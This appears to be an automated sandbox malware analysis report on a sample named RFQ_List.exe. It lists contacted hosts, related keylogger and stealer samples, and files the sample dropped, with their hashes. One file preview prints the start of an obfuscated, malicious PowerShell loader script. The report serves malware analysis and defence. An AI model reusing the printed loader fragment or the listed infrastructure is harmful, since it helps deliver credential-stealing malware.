http://nsis.sf.net/NSIS_ErrorError	RFQ_List.exe, RFQ_List.exe.1.dr	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/155.94.241.188$	msiexec.exe, 00000006.00000002.2678507251.0000000025258000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.000000002523D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000252A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025294000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000251ED000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.0000000025266000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2332064457.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2332064457.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000006.00000002.2678507251.00000000251AA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.206	drive.google.com	United States	15169	GOOGLEUS	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.217.16.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543566
Start date and time:	2024-10-28 06:45:03 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQ_List.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@11/20@4/4
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 95% Number of executed functions: 155 Number of non-executed functions: 43
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 5788 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6840 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:46:01	API Interceptor	38x Sleep call for process: powershell.exe modified
01:47:20	API Interceptor	96x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
	SR3JZpolPo.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	5Z1WFRMTOXRH6X21Z8NU8.exe	Get hash	malicious	Unknown	Browse	artvisions-autoinsider.com/8bkjdSdfjCe/index.php
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/cDXpxO66/download
	Instruction_1928.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	WBCDZ4Z3M2667YBDZ5K4.bin.exe	Get hash	malicious	Unknown	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.rs-ag.com/
	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	aa.opencompanies.co.uk/vEXJm/
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/KXy1F
158.101.44.242	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse	checkip.dyndns.org/
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Renommxterne.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	CLOSURE.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	na.doc	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	mnobizxv.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
checkip.dyndns.com	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	na.doc	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	mnobizxv.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	XWe8H4gRPb.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	XWe8H4gRPb.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
ORACLE-BMC-31898US	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	na.doc	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	mnobizxv.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	130.61.64.122
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	JOSXXL1.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	JOSXXL1.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	8m9f0jVE2G.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	8m9f0jVE2G.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://docs.google.com/drawings/d/1igp9x84Q_2r8qSa1YDSk9dpVvjHGWjRjQMSbSGGfj2M/preview?pli=1VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv	Get hash	malicious	Unknown	Browse	188.114.97.3
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
37f463bf4616ecd445d4a1937da06e19	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.206 172.217.16.193
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	142.250.185.206 172.217.16.193
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	142.250.185.206 172.217.16.193
	CQlUZ4KuAa.exe	Get hash	malicious	Vidar	Browse	142.250.185.206 172.217.16.193
	yt5xqAvHnZ.exe	Get hash	malicious	Vidar	Browse	142.250.185.206 172.217.16.193
	9yJSTTEg68.exe	Get hash	malicious	Vidar	Browse	142.250.185.206 172.217.16.193
	f6ffg1sZS2.exe	Get hash	malicious	Babuk, Djvu	Browse	142.250.185.206 172.217.16.193
	17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exe	Get hash	malicious	Zhark RAT	Browse	142.250.185.206 172.217.16.193
	17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exe	Get hash	malicious	Zhark RAT	Browse	142.250.185.206 172.217.16.193
	wifipr.exe	Get hash	malicious	Unknown	Browse	142.250.185.206 172.217.16.193

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.353332853270839
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
MD5:	A4AF0F36EC4E0C69DC0F860C891E8BBE
SHA1:	28DD81A1EDDF71CBCBF86DA986E047279EF097CD
SHA-256:	B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
SHA-512:	A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Damascenere.lnk

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	821
Entropy (8bit):	3.07939173284978
Encrypted:	false
SSDEEP:	12:8wl0dRi/kdT0Bnn1recmmbll1recmERKQ1ooPiMolkKwDuu1l4C:8p4BnndnR9WAl4k1DfwC
MD5:	571C882640436E4C3A401B4CC3D25F7A
SHA1:	B779BB14B19DBC737898D8AC63BDB924CA596CEB
SHA-256:	4C82C5866B8EEC3D975CA718FFC158FA54970BF1F22F2BAF6AB8820571F3B805
SHA-512:	336F47FFD6E803912508F49C7DA27CAEF12CA8999DC7C0F9BD257F4C376B762DCC3E92D9924B8FB2123BB2FDC5A53C50295804D229F157C12BC6983E782B208B
Malicious:	false
Reputation:	low
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................b.1...........ProgramData.H............................................P.r.o.g.r.a.m.D.a.t.a.....h.1...........Polyhistorisk.L............................................P.o.l.y.h.i.s.t.o.r.i.s.k.......2...........fagbladsjournalistens.ugi.d............................................f.a.g.b.l.a.d.s.j.o.u.r.n.a.l.i.s.t.e.n.s...u.g.i...(...H.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.P.o.l.y.h.i.s.t.o.r.i.s.k.\.f.a.g.b.l.a.d.s.j.o.u.r.n.a.l.i.s.t.e.n.s...u.g.i.e.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.e.r.i.t.o.n.e.a.l.i.z.i.n.g.\.n.o.m.a.d.e.i.n.v.a.s.i.o.n.e.r.s.\.s.t.o.f.h.a.n.d.s.k.e.r.n.e.s.\.M.i.c.r.o.b.i.o.s.i.s.\.D.r.i.f.t.e.r.n.e.s.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfn5nrr5.t0s.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktypj4l3.rbd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1ciw54n.ydz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ourykt1r.st3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37

Download File

Process:	C:\Users\user\Desktop\RFQ_List.exe
File Type:	ASCII text, with very long lines (3209), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	53988
Entropy (8bit):	5.360834504404642
Encrypted:	false
SSDEEP:	768:vmhC4iu9gl9h6rLL44XFeko5AQ5JX61IB5w0w9g5OrVrd3dRnxLNEAka8l5Zowvm:vmsJjw744FYwgw0wSgZp0Aka8lHosvY7
MD5:	F80DE07A4CE30153F8406DB6A12AF56E
SHA1:	BBE21FA2D5C1C6F2CAD16333A3D095547F3426D2
SHA-256:	510D5A55E94D189AB5AFADB87A4FB0BE42220646E2B2CB470511C3055C0EEBA6
SHA-512:	248A69F2A9BA266D4A571646F2235F67833EDF425F3A0350BECD520CC941B556BCCD863EC8270DE81EE48DC91BCC8F5A9BC71E51A89FD4EED529C843F1E43428
Malicious:	true
Preview:	$Udvisningen=$Steward;..<#Umbiliciform Bughindernes Unistylist Scarifier #>..<#Familiariseres doloriferous forfinelsens Photochromography #>..<#Steuropiskes Cicada Forsorteringens thiostannite Diminutivets Fortegnsvariationerne krakens #>..<#Kridtstreg Adjudantsnoren Foxed Eyewash Tidsflgeplanernes Akvariefisken #>..<#Nonpraedial Jugoslaviensrejse Griddled #>..<#Clithe Nondemonstrativeness Smedningernes Hjerteligstes #>...$Herns = @'.One s. Qua.$Out.aGGlyceaSyntruBocaslBranclMis oiUdl.fsSymbomFo,ehealene=Forwe$trustFT,bueoUrotorBarnauOpgavd Brumsdevalek rboe Pe,slTandliSkrfngSpksttOuang; Tjen.ManerfFirmau,rintnRekticStr,kt.esini SaraoBenefnUdsug Non,lVKan iebakkea VulglAnkylsRaptukurteki Sj pnDisko3 For.6Tredi A.msw(Jclin$OkkulHH,ndeaThou.dVentelRgerneKodeny Fors,Cykel$TritevHartvaKategrDiploe SmuttcharmaUdbrigLyctueSognel orbrs Fr.teRigm,nCrim,)Braid Koaeu{Scutc. C,un.Testu$ Spa,O,redjv Ov.reKondirStr,ncG,ardh Defri Afsplnon xd Enwoi GaarsTe pthBackl Immun(UdannKFor.iaNed.rsKurs kBrnd

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	927736
Entropy (8bit):	7.8603182914839635
Encrypted:	false
SSDEEP:	24576:dbusrIDaWLwBhB9XE/2D6lm7Pytae6/B1GX:SX8zB9XQ2gm7OjGB1GX
MD5:	27393AC93E0C60C934AFA5CCDFC7C529
SHA1:	E1989CE514EFD53819BE62E8AA4C51975DA0B3E0
SHA-256:	66F7CA7287B5118119D8E6B8D55222D7662DA16C12345A6122A28B64702AE69B
SHA-512:	672583E3937F3F5F5E84843913DA032D5F6D6D32C759758E37710DFF340973F9F0C77FB8F5B7B176B26EDDDEC5851AA4902DEB103B277B7403EA57D88292B438
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P..s...P...V...P..Rich.P..........................PE..L......V.................d...........2............@..................................x....@.........................................................................................................................................................text...\|c.......d.................. ..`.rdata..\|............h..............@..@.data................~..............@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
